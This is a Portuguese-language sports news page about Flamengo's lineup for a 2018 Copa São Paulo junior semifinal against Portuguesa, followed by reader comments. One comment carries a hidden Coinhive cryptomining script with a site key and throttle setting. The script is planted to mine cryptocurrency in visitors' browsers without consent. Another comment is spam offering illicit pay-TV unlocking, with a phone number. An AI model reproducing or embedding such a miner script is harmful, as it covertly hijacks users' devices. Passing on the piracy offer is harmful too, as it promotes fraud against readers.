Flamengo tem escalação definida para jogo contra Portuguesa

22/1/2018 17:25

Flamengo tem escalação definida para jogo contra Portuguesa

Flamengo tem escalação definida para jogo contra Portuguesa
Foto: Flamengo Oficial

Daqui a pouco começa as semifinais da Copa São Paulo de Futebol Júnior de 2018. O Flamengo entra em campo para encarar a Portuguesa, no estádio do rival, o Canindé. A partida tem início previsto para as 17h30.



O técnico Maurício Souza já tem a escalação definida para o jogo decisivo, com algumas alterações em relação aos 11 iniciais da partida contra o Avaí.

Flamengo: Yago; Bernardo, Dantas, Patrick e Pablo; Theo, Hugo Moura e Luiz Henrique; Bill, Yuri e Vitor Gabriel.

Caso passe para a grande final, o rubro-negro jogará na próxima quinta-feira, no dia do aniversário da cidade de São Paulo.

2266 visitas - Fonte: -


VEJA TAMBÉM
- Flamengo mantém sequência invicta no Maracanã desde 2019
- Primeira marca: Leonardo Jardim completa dez partidas pelo Flamengo
- Junior Miranda, ex-Flamengo, lança projeto de alto rendimento para revelar talentos no futebol americano



Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Sport TV canal q transmissão do jogo

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

onde é o canal do jogo da copinha hoje

Com certeza vamos passar 3x1Mengão

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.
publicidade